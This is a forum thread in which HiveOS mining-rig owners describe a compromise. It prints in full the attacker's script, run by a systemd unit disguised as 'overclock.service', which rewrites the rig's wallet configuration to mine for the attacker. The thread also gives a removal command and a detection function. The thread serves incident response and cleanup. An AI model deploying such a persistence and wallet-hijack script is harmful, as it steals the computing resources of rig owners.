HIVE MALWARE ...... started with or as "overclock.service"

Hi,
we are under attack from some idiot(s) using the bad hive security to start a service that changes the flight sheet every 30min…

I changed all passwords and also reinstalled hive with hiveflasher…

I found this just an hour ago so I don't know if the script/attacker is reproducing itself over the network (previously reinstalled without LAN connection)…

attacker address → 0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C

bad service → systemctl status overclock → /lib/systemd/system/overclock.service

/sys/fs/cgroup/unified/system.slice/overclock.service# systemctl status overclock
● overclock.service - Error
Loaded: loaded (/lib/systemd/system/overclock.service; enabled; vendor preset: enabled)
Active: active (running) since Sat 2022-01-15 23:13:27 CET; 5h 1min ago
Main PID: 19552 (bash)
Tasks: 57 (limit: 4286)
CGroup: /system.slice/overclock.service
├─ 580 SCREEN -dm -c /hive/etc/screenrc.miner bash
├─ 600 bash /hive/bin/miner-run gminer 1
├─ 628 bash /hive/bin/miner-run gminer 1
├─ 679 ./gminer --algo eth --server eu1.ethermine.org --port 4444 --user 0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C.WORKERNAME --pass x --server eu1.ethermine.org --port 14444 --user
├─ 683 /hive/miners/gminer/2.74/gminer --algo eth --server eu1.ethermine.org --port 4444 --user 0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C.WORKERNAME --pass x --server eu1.ethermine.
├─19552 /bin/bash /usr/bin/nvidia-conf
└─24859 sleep 10m

script used → /usr/bin/nvidia-conf

#!/usr/bin/env bash
. /etc/environment
export $(cat /etc/environment | grep -vE '^$|^#' | cut -d= -f1)
loop=2
while [ $loop -le 10 ]
do
if grep -q "0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C" "/hive-config/wallet.conf"; then
echo "ok"
else
sed -i -e "s/^MINER=.*/MINER=gminer/" /hive-config/rig.conf
sed -i -e "s/^MINER2=.*/MINER2=/" /hive-config/rig.conf
mv /hive-config/wallet.conf /hive-config/rig-config-example.txt
cat <<EOF >/hive-config/wallet.conf

### FLIGHT SHEET "Hivepool-ETH-GMiner(Nvidia)"

### Miner gminer

GMINER_ALGO="eth"
GMINER_TEMPLATE="0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C.WORKERNAME"
GMINER_HOST="eu1.ethermine.org
eu1.ethermine.org"
GMINER_PORT="4444
14444"
GMINER_PASS="x"
GMINER_TLS=""
GMINER_ALGO2=""
GMINER_TEMPLATE2=""
GMINER_HOST2=""
GMINER_PORT2=""
GMINER_PASS2=""
GMINER_TLS2=""
GMINER_INTENSITY=""
GMINER_USER_CONFIG=''
GMINER_VER=""

META='{"gminer":{"coin":"ETH"}}'
EOF
dos2unix /hive-config/wallet.conf
dos2unix /hive-config/rig.conf
sleep 30m
/hive/bin/miner restart
fi
/hive/bin/miner start
sleep 10m
echo loop restarting
done

I removed the script … let’s see what happens next -.-

has someone had the same problem?

regards


No suspicious activity until now …

Here is my snippet to delete the service and also the attacker's "nvidia-conf":

systemctl stop overclock.service && rm -f /lib/systemd/system/overclock.service && rm -f /usr/bin/nvidia-conf

Send this in the Hive shell or with the "send command" action.

Change your passwords with the help of the hive-security-guide…

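An added check, written for this thread and not code from the posts or from HiveOS: a shell function that audits a rig for the indicators named above (the overclock.service unit, /usr/bin/nvidia-conf, the attacker wallet inside wallet.conf, and the displaced original config) so you can confirm the cleanup snippet actually took. The tree-root argument is my own addition so the function can be exercised against a staged directory; on a real rig call it with "/".

```shell
#!/usr/bin/env bash
# Added example, not code from the thread. Audits a HiveOS rig for the
# indicators the posts above describe. The tree-root argument is an
# assumption added so the check can run against a staged directory for
# testing; on a real rig call it with "/".

# Attacker wallet quoted in the first post.
BAD_WALLET="0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C"

# check_hive_rig ROOT: prints one FOUND line per indicator present under ROOT.
# Returns 0 when the tree is clean, 1 when anything was found.
check_hive_rig() {
  root="${1%/}"            # strip trailing slash so "/" becomes ""
  found=0

  unit="$root/lib/systemd/system/overclock.service"   # persistence unit
  script="$root/usr/bin/nvidia-conf"                   # attacker's loop script
  wallet="$root/hive-config/wallet.conf"               # flight sheet it rewrites
  backup="$root/hive-config/rig-config-example.txt"    # where it moved the original

  if [ -f "$unit" ]; then
    echo "FOUND systemd unit: $unit"; found=1
  fi
  if [ -f "$script" ]; then
    echo "FOUND script: $script"; found=1
  fi
  if [ -f "$wallet" ] && grep -q "$BAD_WALLET" "$wallet"; then
    echo "FOUND attacker wallet in $wallet"; found=1
  fi
  if [ -f "$backup" ]; then
    echo "FOUND displaced original config: $backup (restore it after cleanup)"; found=1
  fi
  return "$found"
}

# Run against the live system when a root is given on the command line.
if [ $# -gt 0 ]; then
  check_hive_rig "$1"
fi
```

A non-zero exit means at least one indicator is still present, so the function can be dropped into a cron job or the Hive "send command" action after cleanup.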

Speculating the rigs are assigned routable addresses vs. behind NAT non-routable addressing?

Appreciate you sharing the data. Thanks.
